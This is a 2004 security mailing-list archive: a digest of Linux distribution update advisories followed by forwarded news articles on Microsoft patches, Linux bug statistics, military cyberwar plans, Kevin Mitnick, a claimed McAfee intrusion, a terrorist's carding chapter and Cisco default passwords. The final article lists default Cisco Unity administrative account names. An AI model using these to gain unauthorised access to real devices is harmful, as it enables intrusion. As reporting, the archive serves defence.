http://www.linuxsecurity.com/content/view/117439

* Fedora: libpng10-1.0.18-1.fc2 update
9th, December, 2004

Updates libpng10 to the current release 1.0.18. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html

http://www.linuxsecurity.com/content/view/117440

* Fedora: glib2-2.4.8-1.fc2 update
9th, December, 2004

Updates GLib to the current stable release 2.4.8. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004-December/msg00004.html

http://www.linuxsecurity.com/content/view/117441

* Fedora: gtk2-2.4.14-1.fc2 update
9th, December, 2004

Updates GTK+ to the current stable release 2.4.14.
For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004-December/msg00007.html

http://www.linuxsecurity.com/content/view/117442

* Fedora: libpng10-1.0.18-1.fc3 update
9th, December, 2004

Updates libpng10 to the current release 1.0.18. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html

http://www.linuxsecurity.com/content/view/117443

* Fedora: libpng-1.2.8-1.fc3 update
9th, December, 2004

Updates libpng to the current release 1.2.8. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html

http://www.linuxsecurity.com/content/view/117444

* Fedora: glib2-2.4.8-1.fc3 update
9th, December, 2004

Updates GLib to the current stable release 2.4.8. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004-December/msg00004.html

http://www.linuxsecurity.com/content/view/117445

* Fedora: gtk2-2.4.14-1.fc3 update
9th, December, 2004

Updates GTK+ to the current stable release 2.4.14. For details about the bugs which have been fixed in this release, see http://mail.gnome.org/archives/gnome-announce-list/2004-December/msg00007.html

http://www.linuxsecurity.com/content/view/117446

* Fedora: postgresql-odbc-7.3-6.2 update
9th, December, 2004

This update fixes problems occurring on 64-bit platforms.

http://www.linuxsecurity.com/content/view/117447

* Fedora: postgresql-odbc-7.3-8.FC3.1 update
9th, December, 2004

This update fixes problems occurring on 64-bit platforms.

http://www.linuxsecurity.com/content/view/117448

* Fedora: postgresql-7.4.6-1.FC2.1 update
9th, December, 2004

This update synchronizes PostgreSQL for FC2 with the version already released in FC3.
  http://www.linuxsecurity.com/content/view/117449

* Fedora: shadow-utils-4.0.3-55 update
  9th, December, 2004
  A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature...
  http://www.linuxsecurity.com/content/view/117452

* Fedora: shadow-utils-4.0.3-56 update
  9th, December, 2004
  A regression has been fixed where strict enforcement of POSIX rules for user and group names prevented Samba 3 from using its "add machine script" feature...
  http://www.linuxsecurity.com/content/view/117453

+---------------------------------+
|  Distribution: Gentoo           | ----------------------------//
+---------------------------------+

* Gentoo: rssh, scponly Unrestricted command execution
  3rd, December, 2004
  rssh and scponly do not filter command-line options that can be exploited to execute any command, thereby allowing a remote user to completely bypass the restricted shell.
  http://www.linuxsecurity.com/content/view/117364

* Gentoo: PDFlib Multiple overflows in the included TIFF library
  6th, December, 2004
  PDFlib is vulnerable to multiple overflows, which can potentially lead to the execution of arbitrary code.
  http://www.linuxsecurity.com/content/view/117393

* Gentoo: imlib Buffer overflows in image decoding
  6th, December, 2004
  Multiple overflows have been found in the imlib library image decoding routines, potentially allowing execution of arbitrary code.
  http://www.linuxsecurity.com/content/view/117394

* Gentoo: perl Insecure temporary file creation
  6th, December, 2004
  Perl is vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files.
  http://www.linuxsecurity.com/content/view/117402

* Gentoo: mirrorselect Insecure temporary file creation
  7th, December, 2004
  mirrorselect is vulnerable to symlink attacks, potentially allowing a local user to overwrite arbitrary files.
  http://www.linuxsecurity.com/content/view/117403

+---------------------------------+
|  Distribution: Mandrake         | ----------------------------//
+---------------------------------+

* Mandrake: drakxtools update
  7th, December, 2004
  Beginning immediately, all bug reports for stable releases will be handled via Bugzilla at http://qa.mandrakesoft.com/. The drakbug tool has been updated to point users of stable releases to Bugzilla.
  http://www.linuxsecurity.com/content/view/117405

* Mandrake: dietlibc fix
  7th, December, 2004
  There was a problem with dietlibc in Mandrakelinux 10.0/amd64 where it would not provide proper support for the AMD64 architecture. The updated package fixes this.
  http://www.linuxsecurity.com/content/view/117406

* Mandrake: gzip fix
  7th, December, 2004
  The Trustix developers found some insecure temporary file creation problems in the zdiff, znew, and gzexe supplemental scripts in the gzip package. These flaws could allow local users to overwrite files via a symlink attack.
  http://www.linuxsecurity.com/content/view/117407

* Mandrake: ImageMagick fix
  7th, December, 2004
  A vulnerability was discovered in ImageMagick where, due to a boundary error within the EXIF parsing routine, a specially crafted graphic image could potentially lead to the execution of arbitrary code.
  http://www.linuxsecurity.com/content/view/117408

* Mandrake: lvm1 fix
  7th, December, 2004
  The Trustix developers discovered that the lvmcreate_initrd script, part of the lvm1 package, created a temporary directory in an insecure manner. This could allow for a symlink attack to create or overwrite arbitrary files with the privileges of the user running the script.
  http://www.linuxsecurity.com/content/view/117409

* Mandrake: rp-pppoe fix
  7th, December, 2004
  Max Vozeler discovered a vulnerability in pppoe, part of the rp-pppoe package. When pppoe is running setuid root, an attacker can overwrite any file on the system.
  Mandrakelinux does not install pppoe setuid root; however, the packages have been patched to prevent this problem.
  http://www.linuxsecurity.com/content/view/117410

* Mandrake: nfs-utils fix
  7th, December, 2004
  SGI developers discovered a remote DoS (Denial of Service) condition in the NFS statd server. rpc.statd did not ignore the "SIGPIPE" signal, which would cause it to shut down if a misconfigured or malicious peer terminated the TCP connection prematurely.
  http://www.linuxsecurity.com/content/view/117411

* Mandrake: openssl fix
  7th, December, 2004
  The Trustix developers found that the der_chop script, included in the openssl package, created temporary files insecurely. This could allow local users to overwrite files using a symlink attack.
  http://www.linuxsecurity.com/content/view/117412

+---------------------------------+
|  Distribution: Trustix          | ----------------------------//
+---------------------------------+

* Trustix: multiple package bugfixes
  9th, December, 2004
  amavisd-new: AMaViS is a script that interfaces a mail transport agent (MTA) with one or more virus scanners.
  http://www.linuxsecurity.com/content/view/117437

* Trustix: nfs-util Remote denial of service
  9th, December, 2004
  SGI developers discovered a remote Denial of Service in the NFS statd server where it did not ignore the "SIGPIPE" signal. This could cause the server to shut down if a client terminates prematurely.
  http://www.linuxsecurity.com/content/view/117438

+---------------------------------+
|  Distribution: Red Hat          | ----------------------------//
+---------------------------------+

* Red Hat: ImageMagick security vulnerability fix
  8th, December, 2004
  Updated ImageMagick packages that fix a buffer overflow are now available.
  http://www.linuxsecurity.com/content/view/117431

+---------------------------------+
|  Distribution: SuSE             | ----------------------------//
+---------------------------------+

* SuSE: cyrus-imapd remote command execution
  3rd, December, 2004
  Stefan Esser reported various bugs within the Cyrus IMAP Server. These include buffer overflows and out-of-bounds memory access which could allow remote attackers to execute arbitrary commands as root. The bugs occur in the pre-authentication phase, therefore an update is strongly recommended.
  http://www.linuxsecurity.com/content/view/117317

+---------------------------------+
|  Distribution: TurboLinux       | ----------------------------//
+---------------------------------+

* TurboLinux: samba, cups vulnerabilities
  8th, December, 2004
  Two vulnerabilities discovered in Samba. DoS vulnerability in cups.
  http://www.linuxsecurity.com/content/view/117424

------------------------------------------------------------------------
Distributed by: Guardian Digital, Inc. LinuxSecurity.com

To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message.
------------------------------------------------------------------------


From isn at c4i.org Wed Dec 15 03:25:11 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 15 03:41:27 2004
Subject: [ISN] Desktop search new target for viruses?
Message-ID:

http://news.com.com/Desktop+search+new+target+for+viruses/2100-7349_3-5491070.html

By Munir Kotadia
Special to CNET News.com
December 14, 2004

Security experts are warning that virus writers could use new desktop search tools to make their malicious software more efficient.

Foad Fadaghi, senior industry analyst at Frost & Sullivan Australia, said that most viruses are designed to harvest e-mail addresses and other personal information from an infected system.
He warned that because desktop search tools such as those recently announced by Google, Microsoft and Yahoo can index and categorize that information, virus writers are likely to start exploiting the technology.

"Desktop search products are very efficient at harvesting data, so it wouldn't be surprising if exploits are sought by malicious coders. Any software that can index and capture data on a user's PC will be subject to virus and Trojan exploits. It is just a matter of time," Fadaghi said.

Neil Campbell, the national security manager of IT services company Dimension Data, said that any change in the desktop environment can create new security vulnerabilities, so when companies decide to adopt a new product they should look beyond the user benefits.

"It sounds like great technology, but don't deploy it without considering the security implications. With any new product area there is a need to consider security," Campbell said.

According to Campbell, virus writers are unlikely to start targeting the new tools immediately--but only because they are not common.

"It is not going to be in the virus writers' best interest to target them immediately. I would expect the spread of a virus to be inhibited because of the low take-up rate--at least to start with," Campbell said.

Viruses have already used Internet search engines to harvest e-mail addresses. In July, a MyDoom variant pumped so many queries into Google that the search engine was unavailable or very slow for large periods of time. The same variant of MyDoom also succeeded in knocking a number of smaller search engines--including Lycos and AltaVista--off the Web completely.

At the time, Graham Cluley, senior technology consultant at antivirus firm Sophos, said he expected virus authors to continue manipulating search engine technologies. "You don't have to be psychic to predict the release of more worms trying to scoop up e-mail addresses from search engines.
Unfortunately, we expect to see other worm authors trying similar tricks in the future," Cluley said.

Dimension Data's Campbell said that if companies do choose to use desktop search tools, they should take extra care to ensure viruses do not get a chance to reach the desktop.

"You need to consider these issues once the virus has infected your PC, but more importantly, companies should prevent the virus from executing. Make sure the PCs are up-to-date from a patch and antivirus perspective and loaded with a personal firewall," Campbell said.

Munir Kotadia of ZDNet Australia reported from Sydney.


From isn at c4i.org Wed Dec 15 03:25:58 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 15 03:41:31 2004
Subject: [ISN] Microsoft Plugs Code Execution Holes on Patch Day
Message-ID:

http://www.eweek.com/article2/0,1759,1741024,00.asp

By Ryan Naraine
December 14, 2004

Microsoft on Tuesday released fixes for five vulnerabilities in Windows products, including a patch for a known security issue in the WINS (Windows Internet Name Service) name server.

As expected, the company released five advisories with "important" severity ratings but warned that four of the five could lead to code execution attacks.

Microsoft typically rates code execution flaws as "critical," and the lowered ratings raised some eyebrows since independent researchers have already warned of the serious nature of the WINS vulnerability, which could allow a remote attacker to take complete control of an affected system.

According to Stephen Toulouse, program manager at the Microsoft Security Response Center, "critical" ratings are reserved for bugs that the company considers "wormable."

"A critical vulnerability means that, in the default scenario on a PC connected to the Internet, a criminal could exploit it in such a way that it spreads from machine to machine. We reserve critical ratings for vulnerabilities that are wormable," Toulouse told eWEEK.com.

"Code execution does not necessarily mean it's critical," he said, explaining that the WINS vulnerability was rated one step below because it was not an Internet-facing technology and because the service is not installed by default on Windows systems.

The WINS patch (MS04-045) comes just two weeks after a private research firm warned that it could lead to complete system hijack. Microsoft confirmed as much in its December advisory.

"An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing or deleting data; or creating new accounts that have full privileges," the company said.

The company said WINS users were at risk of system hijack because of the way the WINS server handles computer name validation and association context validation.

A hacker could exploit the name validation flaw by constructing a malicious network packet that could potentially allow remote code execution on an affected system.

According to the alert, the association context vulnerability could allow an attacker to construct a malicious network packet to take complete control of an affected system. In Windows Server 2003, the company said an exploit would only result in a denial-of-service condition.

Microsoft already released bulletin MS04-041 to plug two holes in WordPad that put users at risk of code execution attacks. Affected software includes Windows NT Server 4.0, Windows 2000, Windows XP Service Pack 1 and Windows Server 2003.

The WordPad flaws exist in the table conversion and font conversion features. While a successful attack could lead to harmful code execution, Microsoft said significant user interaction is required to exploit both vulnerabilities.

A third patch, MS04-042, corrects two bugs in the DHCP (Dynamic Host Configuration Protocol) Server service that could allow code execution and denial-of-service attacks.
The DHCP flaw affects Windows NT Server 4.0 customers. Microsoft warned that a successful exploit of the DHCP holes could allow an attacker to take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges.

A separate advisory, MS04-043, was released to stop a buffer overrun found in the Windows HyperTerminal utility. Affected software includes Windows NT Server 4.0, Windows 2000, Windows XP (SP1 and SP2) and Windows Server 2003.

The company warned that an attacker could construct a malicious HyperTerminal session file to launch code on a vulnerable system.

"This vulnerability could attempt to be exploited through a malicious Telnet URL if HyperTerminal has been set as the default Telnet client. An attacker who successfully exploited this vulnerability could take complete control of an affected system," according to the advisory.

The fifth "important" advisory for December, MS04-044, corrects issues in Windows Kernel and LSASS that could allow privilege elevation attacks. Microsoft said a successful exploit could put users at risk of having programs installed or data viewed, deleted or changed.

The company also reissued the MS04-028 advisory, which affected JPEG Parsing (GDI+) in Windows, Office, Graphics Application and Developer Applications subsystem in Microsoft Windows. The reissue addresses newly available updates for Microsoft Visual FoxPro 8.0 and the Windows .NET Framework 1.0 and 1.1 without Service Pack 1.

Two of the five December bulletins apply to Windows XP Service Pack 2, but the severity rating is reduced to "moderate" for those customers.


From isn at c4i.org Wed Dec 15 03:26:20 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 15 03:41:33 2004
Subject: [ISN] Linux: Fewer Bugs Than Rivals
Message-ID:

http://www.wired.com/news/linux/0,1411,66022,00.html

By Michelle Delio
Dec. 14, 2004

Linux advocates have long insisted that open-source development results in better and more secure software. Now they have statistics to back up their claims.

According to a four-year analysis of the 5.7 million lines of Linux source code conducted by five Stanford University computer science researchers, the Linux kernel programming code is better and more secure than the programming code of most proprietary software.

The report, set to be released on Tuesday, states that the 2.6 Linux production kernel, shipped with software from Red Hat, Novell and other major Linux software vendors, contains 985 bugs in 5.7 million lines of code, well below the industry average for commercial enterprise software. Windows XP, by comparison, contains about 40 million lines of code, with new bugs found on a frequent basis.

Commercial software typically has 20 to 30 bugs for every 1,000 lines of code, according to Carnegie Mellon University's CyLab Sustainable Computing Consortium. This would be equivalent to 114,000 to 171,000 bugs in 5.7 million lines of code.

The study identified 0.17 bugs per 1,000 lines of code in the Linux kernel. Of the 985 bugs identified, 627 were in critical parts of the kernel. Another 569 could cause a system crash, 100 were security holes, and 33 of the bugs could result in less-than-optimal system performance.

Seth Hallem, CEO of Coverity, a provider of source-code analysis, noted that the majority of the bugs documented in the study have already been fixed by members of the open-source development community.

"Our findings show that Linux contains an extremely low defect rate and is evidence of the strong security of Linux," said Hallem. "Many security holes in software are the result of software bugs that can be eliminated with good programming processes."
The Linux source-code analysis project started in 2000 at the Stanford University Computer Science Research Center as part of a large research initiative to improve core software engineering processes in the software industry. The initiative now continues at Coverity, a software engineering startup that now employs the five researchers who conducted the study.

Coverity said it intends to start providing Linux bug analysis reports on a regular basis and will make a summary of the results freely available to the Linux development community.

"This is a benefit to the Linux development community, and we appreciate Coverity's efforts to help us improve the security and stability of Linux," said Andrew Morton, lead Linux kernel maintainer. Morton said developers have already addressed the top-priority bugs uncovered in the study.


From isn at c4i.org Wed Dec 15 03:26:46 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 15 03:41:35 2004
Subject: [ISN] Air Force seeks cyberwar edge
Message-ID:

Forwarded from: William Knowles

http://www.fcw.com/fcw/articles/2004/1213/web-cyberwar-12-14-04.asp

By Frank Tiboni
Dec. 14, 2004

Air Force officials plan to award contracts worth up to $25 million for computer warfare technologies, according to a solicitation [1] issued today.

Officials in the Air Force's Research Laboratory in Rome, N.Y., want industry officials to submit papers explaining their ideas and capabilities through 2008. They will review them and award contracts as they receive them, according to the "Cyber Defensive & Offensive Operations Technology" document published today on the Federal Business Opportunities Web site.

Industry officials can submit white papers no longer than 10 pages in five computer warfare areas. They include: assured infostructure support; complex systems; covert cyber operations; threat evaluation, attack recognition and diagnosis; and wireless information assurance, the document states.
Defense Department and military services officials do not like to discuss the country's computer warfare capabilities. George Tenet, former CIA director, abruptly but politely ended a question-and-answer session last month at the FCW Events' Homeland Security and Information Assurance Conference and Exhibition 2004 when someone asked if the military could disrupt or destroy information on Web sites operated by al Qaeda.

DOD officials announced plans last year to create an organization that attacks computer networks. The new group would be under U.S. Strategic Command, one of the department's nine unified combatant commands, which either oversee the use of combat forces in a geographic region or provide a capability and develop doctrine for it. Strategic Command manages the operation and protection of the military's networks and information operations, including psychological operations and computer network defense and attack.

Industry officials said the military's computer network attack capability originated in the National Security Agency. They said DOD officials moved it a few years ago to the former Joint Task Force-Computer Network Operations until they made the computer network attack organization announcement last year and formed the Joint Task Force-Global Network Operations, devoted entirely to computer network defense, in June.

[1] http://www2.eps.gov/spg/USAF/AFMC/AFRLRRS/Reference%252DNumber%252DBAA%252D03%252D18%252DIFKA/SynopsisP.html

*==============================================================*
"Communications without intelligence is noise; Intelligence without
communications is irrelevant." Gen. Alfred M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*


From isn at c4i.org Wed Dec 15 03:27:10 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 15 03:41:37 2004
Subject: [ISN] Done the crime, now it's Mitnick's time
Message-ID:

http://www.theage.com.au/news/Next/Done-the-crime-now-its-Mitnicks-time/2004/12/13/1102786984190.html

By Patrick Gray
December 14, 2004
Next

After a five-month delay, the Department of Immigration has granted the world's most notorious convicted cyber-criminal, Kevin Mitnick, a visa to travel to Australia next year to consult to local companies, accept speaking engagements and promote his new book, scheduled for release in March.

It will be Mitnick's first visit to Australia and one of his few trips outside the US and Europe. Mitnick spent more than five years in jail for his exploits, which included hacking into Motorola, Novell, Fujitsu, Sun Microsystems and Nokia to steal software code. Since his release in 2000, he has worked as a security consultant and written two books, The Art of Deception [1] and The Art of Intrusion [2].

Mitnick will fly to Melbourne on March 2 to deliver a keynote speech to an as yet unnamed company. He will fly back to the US the following week to start a book tour, returning to Australia in April to conduct a workshop.

Mitnick is best known for his uncanny ability to trick employees into revealing sensitive information, a technique called "social engineering". He cites the theft of two customs computers from Sydney International Airport by three men in August last year as one example of a social engineering attack in Australia.

"A lot of companies in Australia are vulnerable," Mitnick says. "That was a pure social engineering attack. We all know they weren't after the hardware, they were after the data."
Both of Mitnick's books are about security but many people will be more eager to read the one he plans to start writing on January 21, 2007, when a court order that stops him from profiting from his crimes expires.

"I'm definitely doing an autobiography," he says. "It's going to focus on the adventure, the things I did when I was a fugitive, how I lived my life and what was going through my head, the close calls nobody knows about. It will be the Catch Me If You Can of cyberspace."

Catch Me If You Can [3] was an autobiography written in 1980 by Frank Abagnale jnr, a con man who passed himself off as a Pan Am pilot while forging $US2.5 million in fake cheques.

There have been books written about Mitnick's exploits, most famously Takedown, written by New York Times journalist John Markoff and Tsutomu Shimomura, one of Mitnick's victims, which was made into a movie. But Mitnick says the real story hasn't been told. He has been portrayed as the "Osama bin-Mitnick of the internet", he says, and he wants to set the record straight. Mitnick launched a legal action against the producers of the Takedown movie, which was settled out of court.

Although Mitnick spent two years on the run from the FBI in the US living under assumed names, he doesn't expect law enforcement to take much interest in his travels these days.

"The only time they call me is when they need my help," Mitnick says. "They don't contact me because they're suspicious I'm doing anything wrong."

Mitnick has just finished a vulnerability assessment of a US credit union. Much of his work involves technical testing and doesn't rely on his mastery of social engineering.

"I'm doing vulnerability penetration tests, I'm going into companies and hardening their systems and network," he says. "It's all technical, no social engineering."

A penetration test is work well suited to Mitnick's talents.
Like the fictional hackers in the 1992 movie Sneakers, he breaks into companies' networks for a fee, submitting a report detailing security weaknesses and vulnerabilities.

Before his release, Mitnick had never been out of the US, with the exception of Canada and Mexico. As much as he enjoys seeing the world, Mitnick confesses he is afraid of flying.

"I hate to fly, man, I hate it. I have to get some sleeping pills to knock me out."

[1] http://www.amazon.com/exec/obidos/ASIN/076454280X/c4iorg
[2] http://www.amazon.com/exec/obidos/ASIN/0764569597/c4iorg
[3] http://www.amazon.com/exec/obidos/ASIN/0767905385/c4iorg


From isn at c4i.org Thu Dec 16 02:01:29 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 16 02:21:09 2004
Subject: [ISN] 'ChineseSpyBoy' claims to have cracked McAfee sites
Message-ID:

http://www.newsforge.com/article.pl?sid=04/12/15/1821208

By Joe Barr
December 15, 2004

Did he or didn't he? A cracker identifying himself as "ChineseSpyBoy" has been contacting news organizations -- including NewsForge -- the past day or so claiming to have broken into McAfee Inc. corporate servers and providing screen shots as evidence. McAfee says he did not break into its boxes but that he did compromise a partner's machine.

After receiving news of the alleged break-ins by email, NewsForge invited "ChineseSpyBoy" into an IRC channel to chat about his exploits earlier today. The invitation was readily accepted.

In that brief chat, "SpyBoy" told us that his motivation was, first of all, to find a challenge, and secondarily because of his unhappiness with McAfee's customer service. He said that McAfee's customer service was "always speaking online chats, never getting no direct answers." But the primary purpose seems to have been to make a bigger name for himself.

When asked if breaking into McAfee's servers was difficult, "SpyBoy" told us: "well took a lot of command tribulation, a little bit of deviation and patience ...
I was snooping, getting as much info on their servers as possible for weeks." He also told us in the IRC chat that "the point was to get in, play a little get out and then publish it, I am not as destructive as I used to be."

As evidence, SpyBoy provided us with links to images on another site which purport to show screen shots captured on McAfee machines. What each screenshot shows, however, is a screen taken on McAfee partner Sento.com's site, which matches up with what McAfee had to say.

NewsForge spoke to McAfee corporate PR representative Dana Lengkeek about the alleged compromise. She insisted that no McAfee machines were broken into and noted that they were first contacted about the alleged break-ins yesterday.

No Sento representatives were available to speak with NewsForge prior to publication.


From isn at c4i.org Thu Dec 16 02:01:50 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 16 02:21:11 2004
Subject: [ISN] An Indonesian's Prison Memoir Takes Holy War Into Cyberspace
Message-ID:

Forwarded from: William Knowles

http://www.washingtonpost.com/wp-dyn/articles/A62095-2004Dec13.html

By Alan Sipress
Washington Post Foreign Service
December 14, 2004

JAKARTA, Indonesia -- After Imam Samudra was charged with engineering the devastating Bali nightclub bombings two years ago, he taunted his police accusers in court, then greeted his death sentence with the cry, "Infidels die!"

So when Samudra published a jailhouse autobiography this fall, it was not surprising that it contained virulent justifications for the Bali attacks, which killed 202 people, most of them foreign tourists.

But tucked into the back of the 280-page book is a chapter of an entirely different cast titled "Hacking, Why Not?" There, Samudra urges fellow Muslim radicals to take the holy war into cyberspace by attacking U.S. computers, with the particular aim of committing credit card fraud, called "carding." The chapter then provides an outline on how to get started.
The primer on carding is rudimentary, according to U.S. and Indonesian cybercrime experts, but they said the chapter provides a rare glimpse into the mounting threat posed by terrorists using Internet fraud to finance their operations.

"The worry is that an army of people doing cybercrime could raise a great deal of money for other activities that terrorists are carrying out," said Alan Paller, research director of the SANS Institute, a U.S. Internet-security training company.

Samudra, 34, is among the most technologically savvy members of Jemaah Islamiah, an underground Islamic radical movement in Southeast Asia that is linked to al Qaeda. He sought to fund the Bali attacks in part through online credit card fraud, according to Indonesian police. They said Samudra's laptop computer revealed an attempt at carding, but it was unclear whether he had succeeded.

Internet crime experts said Samudra's book seems unprecedented as a tool for recruiting radical Muslims into a campaign of online fraud and building networks of fundraisers.

"This is exactly the kind of advice you would give someone who wanted to get started in cybercrime," said Paller, who reviewed a translation of the chapter. "It doesn't focus on a specific technique, but focuses on how you find techniques and focuses on connecting with other people to act loosely together."

Titled "Me Against the Terrorist!" the book depicts Samudra on the cover in a now-classic pose from his trial last year in Bali. He is clad in a white shirt and white Muslim skullcap, with his right arm outstretched and a single finger raised as he lectures the judges.

Four thousand copies in Indonesian have been issued by a small publisher and are selling for about $4 each in at least seven cities across the islands of Java and Sumatra, said Achmad Michdan, Samudra's attorney, who wrote the foreword. Michdan said the publisher is planning a second run and is considering translating the book into English, French and Arabic.
Profits benefit Samudra's wife and children. Samudra remains on death row.

Most of the book is a memoir that tracks Samudra from his early schooling in Java, through his arms training in the Afghan mountains, his exile in Malaysia and his return to Indonesia. It includes arguments for killing Western civilians and bitter critiques of U.S. policy in Israel, Afghanistan and Iraq, including photographs of Muslim civilian casualties.

Toward the end, Samudra informs readers that the United States is not as invincible as they might think.

"It would not be America if the country were secure. It would not be America if its computer network were impenetrable," he writes at the beginning of the hacking chapter. He continues by urging fellow militants to exploit this opening: "Any man-made product contains weakness because man himself is a weak creature. So it is with the Americans, who boast they are a strong nation."

The chapter is less a how-to manual than a course of study for aspiring hackers and carders. Samudra directs them to specific Indonesian-language Web sites that provide instruction. For those who find these sites too sophisticated, he counsels first learning computer programming languages, in particular Linux, and suggests several other Web sites, including one run by young Muslims. Then he advises learning about hacking by finding mentors through online chats. He lists six chat rooms as sources.

Next, Samudra discusses the process of scanning for Web sites vulnerable to hacking, then moves on to a three-page discussion on the basics of online credit card fraud and money laundering.

"This is hacking for dummies," said Evan F. Kohlmann, a U.S. consultant on international terrorism who also reviewed the chapter. "But in this day and age, you don't have to be an expert hacker to have a tremendous impact."
Kohlmann and other cyberterrorism experts said the kind of online fraud preached by Samudra is becoming increasingly attractive as a source of funding for al Qaeda operatives in several regions of the world. One of the chief hazards posed by Samudra's book is that it could direct religious extremists into the company of more accomplished hackers. Indonesian police assert their country now has more online credit card fraud than any other in the world.

"If you succeed at hacking and get into carding, be ready to make more money within three to six hours than the income of a policeman in six months," Samudra tells his readers. "But don't do it just for the sake of money." He adds, "Remember, the main duty of Muslims is jihad in the name of God, to raise arms against the infidels, especially now the United States and its allies."

Samudra had first sought to finance the Bali nightclub attacks by ordering the robbery of a shop selling gold jewelry in western Java. The heist allegedly netted five pounds of gold and $500. Then he turned to more lucrative targets on the Internet, police and prosecutors said.

At Samudra's trial, police testified that his computer had been used to communicate in chat rooms with others involved in online credit card fraud and contained information on ways to obtain credit card details.

Petrus Reinhard Golose, head of cybercrimes investigations for the Indonesian police, said in an interview that Samudra had asked for religious permission to conduct carding from Abubakar Baasyir, the radical cleric and alleged head of Jemaah Islamiah now on trial in Jakarta in connection with terrorist bombings, including the one in Bali. Golose said police did not know whether Baasyir had blessed Samudra's Internet activities.

Special correspondent Noor Huda Ismail contributed to this report.

*==============================================================*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen Alfred. M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Thu Dec 16 02:02:03 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 16 02:21:13 2004
Subject: [ISN] NSA to take lead on Defense info assurance
Message-ID:

http://gcn.com/vol1_no1/daily-updates/31383-1.html

By Dawn S. Onley
GCN Staff
12/15/04

The National Security Agency is filling a new role in the Defense Department: leading the information assurance path DOD takes to becoming a network-centric workplace.

The new assignment is based on security work the agency did for DOD a few months ago building a security component for the Global Information Grid, said Priscilla E. Guthrie, deputy Defense CIO.

"We asked NSA to build an IA architecture. NSA did a knock-your-socks-off job of doing this," Guthrie said today at a lunch the American Council for Technology and Industry Advisory Council sponsored in Arlington, Va.

The IA component calls for integrating security into the GIG by, among other things, authenticating credentials and security clearances. The plan also calls for the use of some form of user token for the security architecture.

Recently, DOD asked the agency to take the lead for information assurance initiatives across the department, Guthrie said, although that doesn't mean NSA will build everything or own all of the IA dollars.

NSA will put together a GIG Information Assurance Portfolio so DOD can have a go-to agency if portions of the grid lack adequate security, Guthrie said.

"NSA will deliver a vision for what it's going to take to secure the environment," she said. "Some have asked me, 'Why NSA? They don't have the skill set.' I don't know a better construct for the department. This is a blueprint for us to effect this broad IA environment."
Guthrie also said the Pentagon is getting out of the business of application integration and moving more toward data-level integration.

"If you only do integration of applications, I hope we put you out of business," Guthrie told the executives gathered at the lunch. "You must separate data from apps. If they are not separable, we don't want you in the department."

From isn at c4i.org Thu Dec 16 02:02:13 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 16 02:21:15 2004
Subject: [ISN] Microsoft fixes three flaws in XP SP2
Message-ID:

http://www.smh.com.au/news/Breaking/Microsoft-fixes-three-flaws-in-XP-SP2/2004/12/15/1102787120589.html

By Sam Varghese
December 15, 2004

Microsoft has released five security advisories for the month, all of which are rated important - second on a four-tier scale devised by the company - and affect various versions of Windows.

The advisories, released on Tuesday US time, included three patches for holes in service pack 2 for Windows XP which was released in August. One patch fixes a flaw in some versions of Windows which was made public some weeks ago.

Earlier this month, Microsoft issued an out-of-schedule patch to fix a critical flaw in Internet Explorer.

The flaws are in WordPad, the Dynamic Host Control Protocol implementation in Windows NT 4.0, HyperTerminal, the Windows Kernel and the Local Security Authority Subsystem Service and Windows Internet Naming Service.

The company has not addressed a longstanding flaw in Windows 2000, details of which were submitted by eEye Digital Security 134 days ago. A week ago, Microsoft said it was yet to ascertain the severity of this bug.

A second vulnerability discovered by eEye affects Windows Me, Windows 2000, Windows XP and Windows 2003.
Both these vulnerabilities can be remotely exploited, according to eEye, a company which has found numerous serious flaws in various Windows versions in the past, including the vulnerabilities that resulted in attacks by worms like Sasser, Witty, and Code Red.

From isn at c4i.org Thu Dec 16 02:02:25 2004
From: isn at c4i.org (InfoSec News)
Date: Thu Dec 16 02:21:19 2004
Subject: [ISN] Default passwords on Cisco messaging, security products could pose risks, vendor warns
Message-ID:

http://www.nwfusion.com/news/2004/1215ciscosecurity.html

[Can I get a collective DUH?!? - WK]

By Phil Hochmuth
Network World Fusion
12/15/04

Cisco this week warned that default passwords on some of its unified messaging and attack-detection products could allow unauthorized users to gain administrative access to the respective devices.

Certain versions of Cisco's Unity unified messaging server and its Cisco Guard and Traffic Anomaly Detector products ship with common administrative account logons and passwords for each respective product. Unauthorized users with these accounts and passwords could gain administrative access to the products, allowing them to change settings and configurations or divert traffic on the respective devices.

Unity is a server software product that integrates IP-based voicemail with Microsoft Exchange and Lotus Notes e-mail servers. When deployed with Microsoft Exchange, the software ships with several default user name/password combinations that would give someone administrative access. These accounts include the following names, followed by an underscore "_" and the server's name:

* Eadmin
* UNITY_
* UAMIS_
* UOMNI_
* UVPIM_
* Esubsubscriber

Cisco says that someone logging into a Unity server with these accounts could read incoming and outgoing messages on the Unity server, as well as change configurations of how messages are routed. These default account/password combinations are present in Unity versions 2, 3, and 4.
Cisco says users should change the default passwords on these default accounts. A software fix is not necessary.

